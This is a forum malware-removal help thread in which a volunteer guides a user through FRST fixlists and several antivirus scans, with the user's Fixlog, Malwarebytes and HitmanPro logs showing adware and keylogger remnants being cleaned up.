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
 
 
 
========= End of Reg: =========
 
 
 
The system needed a reboot.
 
==== End of Fixlog 15:00:39 ====


#8 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:06:35 PM

Posted 13 March 2017 - 09:42 AM

Hi,

 

This is not the full log. Can you please attach it to your next reply or if it is too big/long please upload it here and post back the link in your next reply.

 

 

Thanks!

 

 

Regards,

Georgi


cXfZ4wS.png


#9 captivekangaroo

captivekangaroo
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:35 AM

Posted 14 March 2017 - 08:52 AM

Here is the link because I couldn't send it all at once. It just wouldn't work.  :smash:  :

 

https://transfer.pcloud.com/download.html?code=5ZCYy6Zf2jXP9WdIxYZtPXpZbo1wd7Ij628YvNUOXY5XhLemh1y7



#10 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:06:35 PM

Posted 14 March 2017 - 09:29 AM

Hi,

 

 

I think we nailed it down. There are only a few leftovers to be deleted:

 

 

Please download the following file => Attached File  fixlist.txt   314bytes   3 downloads and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

This script was written specifically for you, for use on that particular machine.

 

Let me know how are things after the fix above. :)

 

 

Regards,
Georgi


cXfZ4wS.png


#11 captivekangaroo

captivekangaroo
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:35 AM

Posted 14 March 2017 - 10:31 AM

My computer is running in tip-top form now, thanks to bleepingcomputer but especially to you, Georgi. And I will one day, be able to donate to show my appreciation.

No one can live on gratitude alone!

 

https://imagizer.imageshack.us/v2/209x240q90/924/nfX1Iu.jpg

 

 

Per your request, here is what I hope to be the final Fixlog.text:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 13-03-2017
Ran by User (14-03-2017 07:38:06) Run:4
Running from C:\Users\User\Desktop
Loaded Profiles: User (Available Profiles: User)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\Users\User\AppData\Local\SysHashTable
DeleteKey: HKCU\software\cvdsripecv
FF Extension: (Save Search Command) - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default\Extensions\{6523E848-E572-DC38-99AA-65F1138AB5BD} [2017-03-08] [not signed]
end
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Users\User\AppData\Local\SysHashTable => moved successfully
HKCU\software\cvdsripecv => key removed successfully
C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default\Extensions\{6523E848-E572-DC38-99AA-65F1138AB5BD} => moved successfully
 
 
The system needed a reboot.
 
==== End of Fixlog 07:39:52 ====
 
Cheers Georgi!

Edited by captivekangaroo, 14 March 2017 - 10:41 AM.


#12 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:06:35 PM

Posted 14 March 2017 - 12:11 PM

Hi,

 

 

Although we managed to clean the malicious entries from the system I'd recommend to proceed with the steps below just to be on the safe side. :)

 
Here are the last set of steps just to make sure nothing is lurking in the dark corners.


STEP 1
 
 
Please download Malwarebytes Anti-Malware to your desktop.

  • Double-click mb3-setup-consumer-3.0.6.1469.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.

How to get logs: (Export log to save as txt)

  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Export'.
  • Click 'Text file (*.txt)'
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
  • Click Ok
  • Attach that saved log to your next reply.

(Copy to clipboard for pasting into forum replies or tickets)

  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'

 

 

STEP 2

 
1.Please download HitmanPro.

2.Launch the program by double clicking on the HitmanPro icon. (Windows Vista/7 users right click on the HitmanPro icon and select run as administrator).

Note: If the program won't run please then open the program while holding down the left CTRL key until the program is loaded.

3.Click on the next button. You must agree with the terms of EULA. (if asked)

4.Check the box beside "No, I only want to perform a one-time scan to check this computer".

5.Click on the next button.

6.The program will start to scan the computer. The scan will typically take no more than 5 minutes.

7.When the scan is done click on drop-down menu of the found entries (if any) and choose - Apply to all => Ignore <= IMPORTANT!!!
 
96QH4u9.jpg
 
8.Click on the next button.

9.Click on the "Save Log" button.

10.Save that file to your desktop and post the content of that file in your next reply.
 
Note: if there isn't a dropdown menu when the scan is done then please don't delete anything and close HitmanPro

Navigate to C:\ProgramData\HitmanPro\Logs open the report and copy and paste it to your next reply.
 

 

 

STEP 3
 

 

  • Download EmsisoftEmergencyKit, run the exe and extract the content in a folder of your choice like (C:\EEK) by clicking the Extract button.
  • Double-click the desktop-shortcut called Start Emsisoft Emergency Kit to start the tool.
  • Click on the "Yes" button when asked to obtain the latest malware definitions.
  • Once the update is complete click "Scan".
  • Click on the "Yes" button when asked to enable the scan for Potentially Unwanted Applications.
  • Next click on the Custom Scan and select only drive C:\ to be scanned and remove the rest of the drives from the list. When the scan complete, click on the View Report button (don't delete or quarantine anything).
  • Please attach the content of the report in your next reply.

 

 

STEP 4
 
 

And finally I'd like us to scan your machine with ESET OnlineScan:

  • It is recommended to turn off your antivirus program. Click on the E5rfZI9.png button to see which antivirus is currently enabled:

c4VVzVO.png

  • Turn off your antivirus program. See here how to do this.
  • Check the option beside: Enable detection of potentially unwanted applications.
  • Now click on Advanced Settings and make sure that the option Clean threats automatically is NOT checked, and select the following:

Enable detection of potentially unsafe applications
Enable detection of suspicious applications
Scan archives
Enable Anti-Stealth Technology

  • Click on the Change button and select only Operating memory, Autostart locations and drive C:\ to be scanned.

yKulboi.jpg

  • Push the dtoGjAL.png button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.

8L8IBHJ.png

  • When the scan completes a list of found threats will open automatically (if any malicious files are found).

imxEgHt.png

  • Push thecRhRYZ8.png button and save the file to your desktop using a unique name, such as ESETScan.txt. Include the contents of this report in your next reply.
  • Push the 9IjfdXq.png button.
  • Check the box beside RHzfZB1.png to uninstall the application when closed.
  • Push Vc3btaC.png and the close the application clicking the X in upper right corner.

 

 

 

and then if there aren't any issues left I'll give you my final recommendations. ;)
 
 
Regards,
Georgi


cXfZ4wS.png


#13 captivekangaroo

captivekangaroo
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:35 AM

Posted 15 March 2017 - 02:57 PM

All the scans have finished except for ESET Online scanner...14 hours now.. It's seems to be stuck in the "operating memory" portion of the scan on the same file. The file count hasn't changed in some time but the scan time is still advancing.

 

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 3/14/17
Scan Time: 2:26 PM
Logfile: mbamscanlog03142017.txt
Administrator: Yes
 
-Software Information-
Version: 3.0.5.1299
Components Version: 1.0.75
Update Package Version: 1.0.1503
License: Free
 
-System Information-
OS: Windows 10
CPU: x64
File System: NTFS
User: CINDI-HP\User
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 520736
Time Elapsed: 26 min, 31 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 0
(No malicious items detected)
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)

 


HitmanPro 3.7.15.281
www.hitmanpro.com
 
   Computer name . . . . : CINDI-HP
   Windows . . . . . . . : 10.0.0.14393.X64/4
   User name . . . . . . : CINDI-HP\User
   UAC . . . . . . . . . : Enabled
   License . . . . . . . : Free
 
   Scan date . . . . . . : 2017-03-14 16:01:47
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 6m 50s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No
 
   Threats . . . . . . . : 3
   Traces  . . . . . . . : 260
 
   Objects scanned . . . : 2,178,665
   Files scanned . . . . : 121,895
   Remnants scanned  . . : 640,317 files / 1,416,453 keys
 
Malware _____________________________________________________________________
 
   C:\Users\User\Downloads\CouponPrinterCPS.exe
      Size . . . . . . . : 2,810,584 bytes
      Age  . . . . . . . : 620.4 days (2015-07-03 06:10:57)
      Entropy  . . . . . : 8.0
      SHA-256  . . . . . : 684353F97E98F278F629B1B54F1FB91B4C1CFBE284765737A4535921FB6A5CDA
      Product  . . . . . : Coupon Printer
      Publisher  . . . . : Coupons.com Incorporated
      Description  . . . : Coupon Printer Installer
      Version  . . . . . : 5.0.1.6
      Copyright  . . . . : Copyright © 2015 by Coupons.com Incorporated
      RSA Key Size . . . : 2048
      LanguageID . . . . : 1033
      Authenticode . . . : Valid
    > Bitdefender  . . . : Adware.GenericKD.3857785
      Fuzzy  . . . . . . : 101.0
 
   C:\Users\User\Downloads\PublicTransportSetup.exe
      Size . . . . . . . : 2,446,248 bytes
      Age  . . . . . . . : 1016.1 days (2014-06-02 13:01:19)
      Entropy  . . . . . : 8.0
      SHA-256  . . . . . : F93B66A839839F5714C5BCBE1A2A62BF66306E053FB84F50F33760999923FF87
      Product  . . . . . : Inbox Public Transport Toolbar                              
      Publisher  . . . . : Xacti, LLC                                                  
      Description  . . . : Inbox Public Transport Toolbar Setup                        
      Version  . . . . . : 2.0.1.90
      RSA Key Size . . . : 2048
      LanguageID . . . . : 0
      Authenticode . . . : Valid
    > Kaspersky  . . . . : not-a-virus:HEUR:WebToolbar.Win32.Generic
      Fuzzy  . . . . . . : 101.0
 
   C:\Users\User\Downloads\YTD Video Downloader Pro 5.1.1.0.1 Incl Patch\YTD Video Downloader Pro 5.1.1.0.1 Incl Patch\YTDSetup.exe
      Size . . . . . . . : 11,290,808 bytes
      Age  . . . . . . . : 76.7 days (2016-12-27 23:19:34)
      Entropy  . . . . . : 8.0
      SHA-256  . . . . . : 7A0CAB9E07A8AEFAD084D0951D6DDFBB87D4A70344A7775104D3822C96DB3F60
      Product  . . . . . : YTD Video Downloader
      Description  . . . : YTD Video Downloader
      Version  . . . . . : 5.1.1
      Copyright  . . . . : Copyright © 2007-2015 GreenTree Applications SRL
      RSA Key Size . . . : 2048
      LanguageID . . . . : 1033
      Authenticode . . . : Valid
    > Kaspersky  . . . . : not-a-virus:WebToolbar.Win32.Asparnet.gen
      Fuzzy  . . . . . . : 98.0
 
 
Suspicious files ____________________________________________________________
 
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\FRST64[1].exe
      Size . . . . . . . : 2,424,832 bytes
      Age  . . . . . . . : 0.3 days (2017-03-14 07:37:56)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : CCAB47F4440A8DA984A082F2109AF6E983AA3AB9862302FA24D5A2EA8FCFBA58
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
         -126.2s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3165525.jpg
         -113.7s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3166973264.jpg
         -105.3s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3167947222.jpg
         -84.6s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3170334028.jpg
         -60.9s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3173080556.jpg
         -60.9s C:\Windows\Logs\WindowsUpdate\WindowsUpdate.20170314.073655.416.1.etl
         -58.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{51364112-E904-4596-9E38-D3DD931B1AB3}
         -34.0s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3176200926.jpg
         -14.4s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3178469329.jpg
         -7.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{9C3E4012-B94B-425D-9B4F-FD375AED3D15}
         -6.6s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3179363426.jpg
         -3.5s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\82[3].htm
         -1.8s C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\8CRCIXZF.cookie
         -0.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\32\260016688E7FA6A8.dat
          0.0s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\FRST64[1].exe
          0.0s C:\Users\User\Desktop\FRST64.exe
          2.0s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\10CBD6A362EF9D8BCC73CD69DC9A48E9
          3.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\04\312C0C2FAFBD3938.dat
          6.2s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8F2TBE41\up64[1]
          6.9s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3180927778.jpg
          9.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{FDD3499E-AF66-4FBE-8977-DD4499EB64D0}
 
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\Y04E4WDO\FRST64[1].exe
      Size . . . . . . . : 2,424,320 bytes
      Age  . . . . . . . : 3.0 days (2017-03-11 15:59:42)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : 888080A18968475A4AF792C1F4EAED87442D61A9BD32DAAD9763CB641B5C97D9
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
         -9.4s C:\ProgramData\Spyrix Free Keylogger\scr\42805.6246897801.jpg
         -2.9s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\82[1].htm
         -2.3s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{93AC4D83-3E24-4F5B-80C6-F5B9173A96DF}
         -2.0s C:\ProgramData\Spyrix Free Keylogger\scr\42805.6247752199.jpg
         -0.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\45\033DAD7EB9E8FBD1.dat
         -0.3s C:\Users\User\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6AF4EE75E3A4ABA658C0087EB9A0BB5B_556BB0FF4D382D90E7703209690E089E
         -0.3s C:\Users\User\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6AF4EE75E3A4ABA658C0087EB9A0BB5B_556BB0FF4D382D90E7703209690E089E
          0.0s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\Y04E4WDO\FRST64[1].exe
          1.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\F1F9908304C422C2336E772B0E2700A3
          2.3s C:\Users\User\Desktop\FRST-OlderVersion\
          3.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\77\56F089D219DFBA7D.dat
          3.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\45\45C68FBF945E49E5.dat
          6.9s C:\ProgramData\Spyrix Free Keylogger\scr\42805.6248777083.jpg
          9.1s C:\Users\User\Desktop\Fixlog.txt
         15.8s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{B041CF4D-79C9-4D33-A7C4-17904D5B73BC}
 
   C:\Users\User\Desktop\FRST-OlderVersion\FRST64.exe
      Size . . . . . . . : 2,424,320 bytes
      Age  . . . . . . . : 5.1 days (2017-03-09 13:52:01)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : 888080A18968475A4AF792C1F4EAED87442D61A9BD32DAAD9763CB641B5C97D9
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
         -10.0s C:\ProgramData\Spyrix Free Keylogger\scr\42803.536008206.jpg
         -8.3s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5360277431.jpg
         -3.2s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5360862153.jpg
         -0.5s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5361181713.jpg
          0.0s C:\Users\User\Desktop\FRST-OlderVersion\FRST64.exe
          2.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\47\4609A394AF14DF13.dat
          2.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\4\47\4609A394AF14DF13.dat
          2.9s C:\Windows\Logs\WindowsUpdate\WindowsUpdate.20170309.125203.920.1.etl
          4.6s C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\DownloadMetadata
         13.7s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5362817708.jpg
         28.6s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5364545255.jpg
         30.1s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5364713657.jpg
         48.0s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5366792477.jpg
 
   C:\Users\User\Desktop\FRST64.exe
      Size . . . . . . . : 2,424,832 bytes
      Age  . . . . . . . : 0.3 days (2017-03-14 07:37:56)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : CCAB47F4440A8DA984A082F2109AF6E983AA3AB9862302FA24D5A2EA8FCFBA58
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
         -126.2s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3165525.jpg
         -113.7s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3166973264.jpg
         -105.3s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3167947222.jpg
         -84.7s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3170334028.jpg
         -60.9s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3173080556.jpg
         -60.9s C:\Windows\Logs\WindowsUpdate\WindowsUpdate.20170314.073655.416.1.etl
         -58.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{51364112-E904-4596-9E38-D3DD931B1AB3}
         -34.0s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3176200926.jpg
         -14.4s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3178469329.jpg
         -7.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{9C3E4012-B94B-425D-9B4F-FD375AED3D15}
         -6.7s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3179363426.jpg
         -3.5s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\82[3].htm
         -1.8s C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\8CRCIXZF.cookie
         -0.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\32\260016688E7FA6A8.dat
         -0.0s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\FRST64[1].exe
          0.0s C:\Users\User\Desktop\FRST64.exe
          2.0s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\10CBD6A362EF9D8BCC73CD69DC9A48E9
          3.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\04\312C0C2FAFBD3938.dat
          6.1s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8F2TBE41\up64[1]
          6.9s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3180927778.jpg
          9.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{FDD3499E-AF66-4FBE-8977-DD4499EB64D0}
 
 
Potential Unwanted Programs _________________________________________________
 
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\025C146F7549EA35441670D7CB5BB9C7 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\0C21A4BD1810F86CB05870CF95DAC708 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\15659D88A823ABF96332196056D61A76 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\18F3EDC1A61D1B179289EF8D5C4A81C5 (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\2204A3C3BFD211BE4C46C44D320D825F (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\3431D00415544350E7B979EA422D419C (YahooToolbar)
